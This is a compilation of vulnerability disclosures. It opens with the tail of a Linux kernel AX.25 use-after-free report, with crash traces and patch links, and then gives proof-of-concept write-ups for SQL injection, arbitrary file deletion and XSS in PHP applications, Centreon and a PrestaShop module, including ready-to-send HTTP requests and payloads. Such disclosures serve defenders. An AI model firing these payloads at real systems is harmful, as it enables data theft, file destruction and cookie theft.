\[  727.493561\]  tty\_release+0x3a8/0xcc0
\[  727.493561\]  \_\_fput+0x1e2/0x840
\[  727.493561\]  task\_work\_run+0xe8/0x180
\[  727.493561\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  727.493561\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  727.493561\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  727.493561\] RIP: 0033:0x7f6d2c9d4beb
\[  727.493561\] Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 33 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44
\[  727.493561\] RSP: 002b:00007f5cab711ec0 EFLAGS: 00000293 ORIG\_RAX: 0000000000000003
\[  727.493561\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f6d2c9d4beb
\[  727.493561\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003
\[  727.493561\] RBP: 00007f5cab711f00 R08: 0000000000000000 R09: 00007f5cab712700
\[  727.493561\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffee89407be
\[  727.493561\] R13: 00007ffee89407bf R14: 00007f5cab711fc0 R15: 00007f5cab712700

The UAF bug related with lock\_sock() is shown below.

\[  208.472360\] BUG: KASAN: use-after-free in \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\] Write of size 4 at addr ffff88800a0e8088 by task ax25\_clo\_bin/1271
\[  208.472465\] Call Trace:
\[  208.472465\]  dump\_stack+0x7d/0xa3
\[  208.472465\]  print\_address\_description.constprop.0+0x18/0x130
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  kasan\_report.cold+0x7f/0x10e
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  check\_memory\_region+0xf9/0x1e0
\[  208.472465\]  \_raw\_spin\_lock\_bh+0x71/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? schedule+0x8e/0x120
\[  208.472465\]  \_\_lock\_sock+0xd9/0x140
\[  208.472465\]  ? sock\_omalloc+0xc0/0xc0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? wait\_woken+0x110/0x110
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock\_bh+0x80/0xd0
\[  208.472465\]  ? \_raw\_spin\_lock+0xd0/0xd0
\[  208.472465\]  lock\_sock\_nested+0x72/0x80
\[  208.472465\]  ax25\_device\_event+0xef/0x160
\[  208.472465\]  raw\_notifier\_call\_chain+0x5e/0x70
\[  208.472465\]  dev\_close\_many+0x17d/0x230
\[  208.472465\]  ? \_\_dev\_close\_many+0x1c0/0x1c0
\[  208.472465\]  ? \_\_schedule+0x494/0xc30
\[  208.472465\]  rollback\_registered\_many+0x1f1/0x950
\[  208.472465\]  ? clockevents\_program\_event+0xd3/0x130
\[  208.472465\]  ? dev\_alloc\_name+0xd0/0xd0
\[  208.472465\]  ? ldsem\_down\_read+0x410/0x410
\[  208.472465\]  unregister\_netdevice\_queue+0x133/0x200
\[  208.472465\]  ? unregister\_netdevice\_many+0x20/0x20
\[  208.472465\]  ? \_raw\_write\_lock\_bh+0xd0/0xd0
\[  208.472465\]  unregister\_netdev+0x13/0x20
\[  208.472465\]  mkiss\_close+0xc4/0x120
\[  208.472465\]  tty\_ldisc\_hangup+0x1ab/0x2d0
\[  208.472465\]  \_\_tty\_hangup.part.0+0x306/0x510
\[  208.472465\]  tty\_release+0x200/0x670
\[  208.472465\]  \_\_fput+0x104/0x3b0
\[  208.472465\]  task\_work\_run+0x8f/0xd0
\[  208.472465\]  exit\_to\_user\_mode\_prepare+0x114/0x120
\[  208.472465\]  syscall\_exit\_to\_user\_mode+0x1d/0x40
\[  208.472465\]  entry\_SYSCALL\_64\_after\_hwframe+0x44/0xa9
\[  208.472465\] RIP: 0033:0x7f7900bb1beb
\[  208.472465\] Code: 0f 05 48 3d 00 f0 ff ff 77 45 c3 0f 1f 40 00 48 83 ec 18 89 7c 24 0c e8 33 fc ff ff 8b 7c 24 0c 41 89 c0 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 2f 44 89 c7 89 44 24 0c e8 71 fc ff ff 8b 44
\[  208.472465\] RSP: 002b:00007f78ff9c8ec0 EFLAGS: 00000293 ORIG\_RAX: 0000000000000003
\[  208.472465\] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f7900bb1beb
\[  208.472465\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000003
\[  208.472465\] RBP: 00007f78ff9c8f00 R08: 0000000000000000 R09: 00007f78ff9c9700
\[  208.472465\] R10: 0000000000000000 R11: 0000000000000293 R12: 00007ffd364d6b9e
\[  208.472465\] R13: 00007ffd364d6b9f R14: 00007f78ff9c8fc0 R15: 00007f78ff9c9700

=\*=\*=\*=\*=\*=\*=\*=\*=  Bug Fix  =\*=\*=\*=\*=\*=\*=\*=\*=

The patch that have been applied to mainline Linux kernel is shown below.
https://github.com/torvalds/linux/commit/4e0f718daf97d47cf7dec122da1be970f145c809
https://github.com/torvalds/linux/commit/7ec02f5ac8a5be5a3f20611731243dc5e1d9ba10
https://github.com/torvalds/linux/commit/71171ac8eb34ce7fe6b3267dce27c313ab3cb3ac

=\*=\*=\*=\*=\*=\*=\*=\*=  Timeline  =\*=\*=\*=\*=\*=\*=\*=\*=

2022-01-28: commit 4e0f718daf97 accepted to mainline kernel
2022-02-09: commit 7ec02f5ac8a5 accepted to mainline kernel
2022-03-09: commit 71171ac8eb34 accepted to mainline kernel
2022-04-01: CVE-2022-1199 is assigned

=\*=\*=\*=\*=\*=\*=\*=\*=  Credit  =\*=\*=\*=\*=\*=\*=\*=\*=

Duoming Zhou <duoming@....edu.cn>

Best Regards,
Duoming Zhou

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-1199: security - CVE-2022-1199 kernel: Null pointer dereference and use-after-free in ax25_release()

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=user/manage_user&id=.

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/?page=user/manage\_user&id=

Vulnerability location: /isms/admin/?page=user/manage\_user&id=, id

db\_name = isms\_db;

\[+\] Payload: /isms/admin/?page=user/manage\_user&id=-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11--+ // Leak place ---> id

GET /isms/admin/?page\=user/manage\_user&id\=\-2%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

CVE-2022-36690: vul-wiki/SQLi-4.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain an arbitrary file deletion vulnerability via the component /classes/Master.php?f=delete_img.

**Ingredients Stock Management System v1.0 by oretnom23 has Delete any file**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/classes/Master.php?f=delete\_img

Vulnerability location: /isms/classes/Master.php?f=delete\_img, path

The password for the backend login account is: admin/admin123

Payload:

Here we delete the shell.php file in the root directory

POST /isms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
path=C:\\xampp\\htdocs\\pms\\shell.php

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the root directory of the website

The response package shows that the deletion was successful. Let's go to the root directory to see if the shell.php file still exists. 

By this time, shell.php has been deleted.

CVE-2022-36687: vul-wiki/delet-file-1.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the month parameter at /admin/?page=reports/stockout&month=.

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/?page=reports/stockout&month=

Vulnerability location: /isms/admin/?page=reports/stockout&month=, month

db\_name = isms\_db;

\[+\] Payload: /isms/admin/?page=reports/stockout&month=2022-07%27%20union%20select%201,2,3,4,5,6,7,database(),9,10--+ // Leak place ---> month

GET /isms/admin/?page\=reports/stockout&month\=2022\-07%27%20union%20select%201,2,3,4,5,6,7,database(),9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

CVE-2022-36688: vul-wiki/SQLi-2.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the month parameter at /admin/?page=reports/stockin&month=.

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/?page=reports/stockin&month=

Vulnerability location: /isms/admin/?page=reports/stockin&month=, month

db\_name = isms\_db;

\[+\] Payload: /isms/admin/?page=reports/stockin&month=2022-07%27%20union%20select%201,2,3,4,5,6,7,database(),9,10--+ // Leak place ---> month

GET /isms/admin/?page\=reports/stockin&month\=2022\-07%27%20union%20select%201,2,3,4,5,6,7,database(),9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

CVE-2022-36686: vul-wiki/SQLi-1.md at master · k0xx11/vul-wiki

Ingredients Stock Management System v1.0 was discovered to contain a SQL injection vulnerability via the month parameter at /admin/?page=reports/waste&month=.

**Ingredients Stock Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html

Vulnerability File: /isms/admin/?page=reports/waste&month=

Vulnerability location: /isms/admin/?page=reports/waste&month=, month

db\_name = isms\_db;

\[+\] Payload: /isms/admin/?page=reports/waste&month=2022-07%27%20union%20select%201,2,3,4,5,6,7,database(),9,10--+ // Leak place ---> month

GET /isms/admin/?page\=reports/waste&month\=2022\-07%27%20union%20select%201,2,3,4,5,6,7,database(),9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=2m880botn1u43hd2gu23ttj4ug
Connection: close

CVE-2022-36689: vul-wiki/SQLi-3.md at master · k0xx11/vul-wiki

Centreon 22.04.0 is vulnerable to Cross Site Scripting (XSS) from the function Pollers > Broker Configuration by adding a crafted payload into the name parameter.

    # Exploit Title: Stored XSS in name parameter in Centreon version 22.04.0# Date: # Exploit Author: syad, yunaranyancat, saitamang# Vendor Homepage: Centreon# Software Link: https://download.centreon.com/# Version: 22.04.0# CVE ID : CVE-2022-36194# Tested on: Centos 7Centreon 22.04.0 is vulnerable to Cross Site Scripting (XSS) from the function Pollers > Broker Configuration by adding a crafted payloadinto the name parameter.go to this endpoint -> /centreon/main.get.php?p=60909 -> Pollers -> Broker Configuration -> Click Button "Add" and put the crafted payload below on section "Name" and savepayload --> test"><body onload=prompt(document.cookie)>

CVE-2022-36194: Centreon 22.04.0 Cross Site Scripting ≈ Packet Storm

A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.

    # Exploit Title:  AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection# Date: 24-08-2022# Exploit Author: Mohamed Ali Hammami# Vendor Homepage: https://apollotheme.com/#Software Link : https://apollotheme.com/products/ap-pagebuilder-prestashop-module# Version: 2.4.4# Tested on: Windows 10#CVE: CVE-2022-22897Parameters: product_all_one_img,image_productPayload: 1) or sleep(4) #Exploit:http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1

Tag

#php